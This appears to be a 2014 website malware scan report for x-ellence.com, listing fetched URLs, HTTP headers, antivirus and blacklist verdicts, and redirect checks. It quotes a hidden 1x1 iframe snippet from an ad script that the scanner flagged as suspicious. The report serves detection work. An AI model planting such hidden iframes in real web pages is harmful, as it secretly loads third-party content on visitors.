Scanned pages/files
Request | Server response | Status |
http://x-ellence.com/ | 200 OK Content-Length: 2023 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
| ||
http://pub5.bravenet.com/passwd/jsinclude.php?usernum=370171291&cpv=2 | 200 OK Content-Length: 1787 Content-Type: text/html | clean |
http://pub5.bravenet.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:38 GMT Pragma: no-cache ETag: PUB5-128ec30d6bd302a7d965f62c891c8d642830dadd-1412438918.4243 Location: http://www.bravenet.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:28 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:37 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:37 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=2pa2slh1irg2521a8pn1l1r445; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:38 GMT; path=/; domain=.bravenet.com | clean |
http://www.bravenet.com/test404page.js | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/ | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://assets.bravenet.com/bn/js/bnui.js | 200 OK Content-Length: 44626 Content-Type: application/x-javascript | clean |
http://pub2.bravenet.com/counter/code.php?id=390456&usernum=137405393&cpv=2 | 200 OK Content-Length: 334 Content-Type: text/html | clean |
http://pub2.bravenet.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:45 GMT Pragma: no-cache ETag: PUB2-60ac892e539bf2f837023efa1f1f713da4f49bc8-1412438925.9663 Location: http://www.bravenet.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:35 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:44 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:44 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=e8d2963glplgo3g3fdlnpscvb4; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:45 GMT; path=/; domain=.bravenet.com | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://ads.pro-market.net/ads/scripts/site-125361.js | 200 OK Content-Length: 820 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 1x1 src: http://pbid.pro-market.net/engine?site= <iframe width='1' height='1' marginwidth='0' marginheight='0' hspace='0' vspace='0' frameborder='0' scrolling='no' src='http://pbid.pro-market.net/engine?site="+ site +";size=1x1;category="+ cat +";kw="+ kw + siteref +"'> | ||
http://assets.bravenet.com/bn/responsive/vendor/bootbox/bootbox.js | 200 OK Content-Length: 23249 Content-Type: application/x-javascript | clean |
http://pub5.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:47 GMT Pragma: no-cache ETag: PUB5-484e3b76578711835dc66ab1a6dc01548028d57f-1412438927.6103 Location: http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:37 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:46 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:46 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=3rtmi0jf04okn1cc63ptnkoq82; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:47 GMT; path=/; domain=.bravenet.com | clean |
http://pub5.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:48 GMT Pragma: no-cache ETag: PUB5-df4382c605eb87705f96b9273e0531156929f7b2-1412438928.0936 Location: http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:38 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:47 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:47 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=lvs646imvolmpqdrr3uuc5jk74; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:48 GMT; path=/; domain=.bravenet.com | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: x-ellence.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 16:08:56 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CMSSESSID287a4a3b=510ij72sokr00sg8bdc59hpsg6; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: x-ellence.com
Referer: http://www.google.com/search?q=x-ellence.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=x-ellence.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://x-ellence.com/
Result: x-ellence.com is not infected or malware details are not published yet.